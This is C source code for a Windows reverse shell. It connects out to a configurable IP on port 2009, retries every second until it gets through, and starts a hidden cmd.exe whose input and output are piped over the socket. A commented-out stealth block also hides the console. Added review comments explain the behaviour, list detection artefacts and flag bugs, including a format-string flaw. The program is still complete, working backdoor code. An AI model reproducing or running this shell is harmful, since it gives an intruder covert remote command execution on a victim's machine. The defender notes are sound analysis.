/* _____ .__ ___. .__ __ __
/ _ \ | |\_ |__ |__| ____ ____ _____| | ____ __ ____ | | __
/ /_\ \| | | __ \| |/ \ / _ \/ ___/ |/ / | \/ \| |/ /
/ | \ |_| \_\ \ | | ( <_> )___ \| <| | / | \ <
\____|__ /____/___ /__|___| /\____/____ >__|_ \____/|___| /__|_ \
\/ \/ \/ \/ \/ \/ \/
*/
#include <winsock2.h>
#include <stdio.h>
//link ws2_32.lib
/* Element count of the relay buffers declared in sendBuffer() and recvBuffer(). */
#define BUFF_SIZE 1024
/* Program that main() starts with its standard handles bound to pipes. */
#define COMMAND_INTERPRETER "cmd.exe" // change this to "command.com" if used under a DOS environment.
/* Remote address main() connects out to (TCP port 2009); as committed this is loopback. */
char IP [20] = "127.0.0.1";
/* Relay helpers defined after main(): pipe -> socket and socket -> pipe. */
int sendBuffer(HANDLE hPipe, SOCKET hSock);
int recvBuffer(HANDLE hPipe, SOCKET hSock);
/*
 * Tears the session down: closes the two pipe handles passed in, terminates
 * the child process referenced by pi (exit code 0) and shuts Winsock down.
 *
 * hRead, hWrite: pipe ends held by this process (main() passes hOutputRd
 *                and hInputWr).
 * pi:            process information filled in by CreateProcess().
 *
 * NOTE(review): nothing in this file calls closesocket() on the connection,
 * pi->hProcess and pi->hThread are never passed to CloseHandle(), and no
 * return value here is checked.
 */
void FreeResources(HANDLE hRead, HANDLE hWrite, PROCESS_INFORMATION *pi)
{
CloseHandle(hRead);
CloseHandle(hWrite);
TerminateProcess(pi->hProcess, 0);
WSACleanup();
}
/*
 * Entry point. As written, the program:
 *   1. connects out over TCP to IP on port 2009, retrying once per second
 *      until connect() succeeds;
 *   2. creates two anonymous pipes and starts COMMAND_INTERPRETER with a
 *      hidden window and its stdin/stdout/stderr bound to those pipes;
 *   3. relays bytes between the pipes and the socket until recvBuffer() or
 *      sendBuffer() returns -1.
 *
 * For defenders, the artefacts visible in this code are the outbound
 * connection to port 2009 (retried every second while the peer is
 * unreachable) and a child cmd.exe started with SW_HIDE whose standard
 * handles are pipes owned by its parent rather than a console.
 *
 * Returns 0 after the relay loop ends, -1 if pipe or process creation fails.
 */
int main(void)
{
/*hide window functionality, un-comment to use*/
/*HWND stealth;
AllocConsole();
stealth=FindWindowA("ConsoleWindowClass",NULL);
ShowWindow(stealth,0);*/
WSADATA wsaData;
SOCKET hSock;
/* NOTE(review): sin, rsin and addr_len are never used below; the bare
 * `sockaddr_in` type name (no `struct`) presumably only compiles as C++. */
sockaddr_in sin = {0}, rsin;
int addr_len = sizeof(sockaddr_in);
DWORD dwErr, dwRet;
HANDLE hOutputRd, hOutputWr, hInputRd, hInputWr;
SECURITY_ATTRIBUTES sa = {sizeof(SECURITY_ATTRIBUTES)};
STARTUPINFO si={0};
PROCESS_INFORMATION pi={0};
/* 0x101 requests Winsock 1.1. NOTE(review): the results of WSAStartup() and
 * socket() are not checked. */
WSAStartup(0x101, &wsaData);
/* NOTE(review): sock_addr is not zero-initialised; only port, family and
 * address are assigned below. */
struct sockaddr_in sock_addr;
int ERR;
hSock = socket(AF_INET, SOCK_STREAM, 0);
sock_addr.sin_port = htons(2009);
sock_addr.sin_family = AF_INET;
sock_addr.sin_addr.s_addr = inet_addr(IP);
/* Retry until the peer accepts. The one-second sleep runs after every
 * attempt, including the successful one, and there is no retry limit. */
do {
ERR = connect(hSock,(struct sockaddr*) &sock_addr, sizeof( sock_addr ));
Sleep(1000);
} while (ERR == SOCKET_ERROR);
/* Pipe handles must be inheritable so the child can use them as its
 * standard handles (CreateProcess is called with bInheritHandles = TRUE). */
sa.lpSecurityDescriptor = NULL;
sa.bInheritHandle = TRUE;
/* Output pipe: child writes hOutputWr, this process reads hOutputRd.
 * NOTE(review): the size argument is a DWORD; NULL is passed where 0 is
 * presumably meant. dwErr is a DWORD but is printed with %d. The error
 * returns below leave the socket and Winsock open. */
if(!CreatePipe(&hOutputRd, &hOutputWr, &sa, NULL))
{
dwErr = GetLastError();
printf("ERROR: Pipe creation failed! (Code %d)\n", dwErr);
return -1;
}
/* Input pipe: this process writes hInputWr, child reads hInputRd.
 * NOTE(review): on failure the first pipe's handles are not closed. */
if(!CreatePipe(&hInputRd, &hInputWr, &sa, NULL))
{
dwErr = GetLastError();
printf("ERROR: Pipe creation failed! (Code %d)\n", dwErr);
return -1;
}
/* Start from this process's own startup info, then redirect the child's
 * stderr and stdout to the output pipe and its stdin to the input pipe.
 * dwFlags is assigned, not OR-ed, so any flags GetStartupInfo() returned
 * are replaced. */
GetStartupInfo(&si);
si.hStdError = hOutputWr;
si.hStdOutput = hOutputWr;
si.hStdInput = hInputRd;
si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
si.wShowWindow = SW_HIDE;
/* NOTE(review): the command line is a string literal; in a UNICODE build
 * CreateProcessW may write to lpCommandLine, so confirm the build is ANSI
 * or pass a writable buffer. */
if(!CreateProcess(NULL, TEXT(COMMAND_INTERPRETER), NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi))
{
dwErr = GetLastError();
printf("ERROR: Process creation failed! (Code %d)\n", dwErr);
return -1;
}
/* The child owns these ends now; this process keeps only hOutputRd and
 * hInputWr. */
CloseHandle(hOutputWr);
CloseHandle(hInputRd);
printf("Connection estabilished with Remote Computer");
/* Relay loop: forward child output to the socket until sendBuffer()
 * reports nothing pending (FALSE), then block in recvBuffer() for the
 * next chunk from the peer and write it to the child's stdin.
 * dwRet is a DWORD, so the `== -1` tests compare against (DWORD)-1. */
for(;;)
{
do
{
dwRet = sendBuffer(hOutputRd, hSock);
if(dwRet == -1)
{
FreeResources(hOutputRd, hInputWr, &pi);
/* NOTE(review): this break leaves only the inner do/while. Execution
 * continues with recvBuffer() on handles that were just closed and after
 * WSACleanup(); recvBuffer() then returns FALSE, so the outer loop does
 * not terminate on this path. */
break;
}
} while (dwRet != FALSE);
dwRet = recvBuffer(hInputWr, hSock);
if(dwRet == -1)
{
/* recvBuffer() returns -1 when recv() returned 0, i.e. the peer closed
 * the connection; this is the only path that reaches the return below. */
FreeResources(hOutputRd, hInputWr, &pi);
break;
}
}
printf("Connection closed, exiting...\n");
return 0;
}
/*
 * Forwards pending child output from hPipe to the socket.
 *
 * hPipe: read end of the child's stdout/stderr pipe.
 * hSock: connected socket.
 *
 * Returns FALSE when the peek fails, nothing is pending, or send() fails;
 * -1 when ReadFile() fails; TRUE after one chunk was sent, following a
 * 50 ms pause.
 *
 * NOTE(review): a send() failure is reported as FALSE, which the caller
 * treats the same as "nothing pending", so a dead socket does not trigger
 * the caller's teardown.
 */
int sendBuffer(HANDLE hPipe, SOCKET hSock)
{
/* NOTE(review): the buffer is TCHAR but is passed to send(), which takes
 * char data; the two only match in a non-UNICODE build - confirm. */
TCHAR szBuffer[BUFF_SIZE];
DWORD nBytesAvail;
/* Peek with a NULL buffer, so no data is consumed here. NOTE(review): the
 * fourth PeekNamedPipe argument is lpBytesRead, while lpTotalBytesAvail is
 * passed as 0; confirm what the call reports into nBytesAvail with a NULL
 * lpBuffer. */
if(!PeekNamedPipe(hPipe, NULL, BUFF_SIZE, &nBytesAvail, 0, 0) || nBytesAvail == 0)
return FALSE;
/* NOTE(review): the read length is the peeked count, not the size of
 * szBuffer; confirm it can never exceed the buffer. nBytesAvail is then
 * overwritten with the number of bytes actually read. */
if(!ReadFile(hPipe, szBuffer, nBytesAvail, &nBytesAvail, 0))
return -1;
/* NOTE(review): a short send() (fewer bytes than requested) is not handled. */
if(send(hSock, szBuffer, nBytesAvail, 0) == SOCKET_ERROR)
return FALSE;
Sleep(50);
return TRUE;
}
/*
 * Receives one chunk from the socket and writes it to hPipe.
 *
 * hPipe: write end of the child's stdin pipe.
 * hSock: connected socket.
 *
 * Returns FALSE when recv() reports SOCKET_ERROR or WriteFile() fails;
 * -1 when recv() returns 0 (peer closed the connection); TRUE after the
 * chunk was written, following a 50 ms pause.
 */
int recvBuffer(HANDLE hPipe, SOCKET hSock)
{
/* NOTE(review): the buffer is TCHAR but recv() fills it as char data; the
 * two only match in a non-UNICODE build - confirm. */
TCHAR szBuffer[BUFF_SIZE];
DWORD nBytesAvail, nBytesWritten;
/* recv() returns int; storing it in a DWORD means SOCKET_ERROR is compared
 * below as its unsigned conversion. */
nBytesAvail = recv(hSock, szBuffer, BUFF_SIZE, 0);
/* NOTE(review): network-supplied bytes are used as the printf format
 * string (CWE-134), and the buffer is not NUL-terminated. The call also
 * runs before the recv() result is checked, so on error or close it reads
 * an uninitialised or stale buffer. */
printf (szBuffer);
if(nBytesAvail == SOCKET_ERROR)
return FALSE;
if(nBytesAvail == 0)
return -1;
/* NOTE(review): nBytesWritten is never compared with nBytesAvail, so a
 * partial write would go unnoticed. */
if(!WriteFile(hPipe, szBuffer, nBytesAvail, &nBytesWritten, NULL))
return FALSE;
Sleep(50);
return TRUE;
}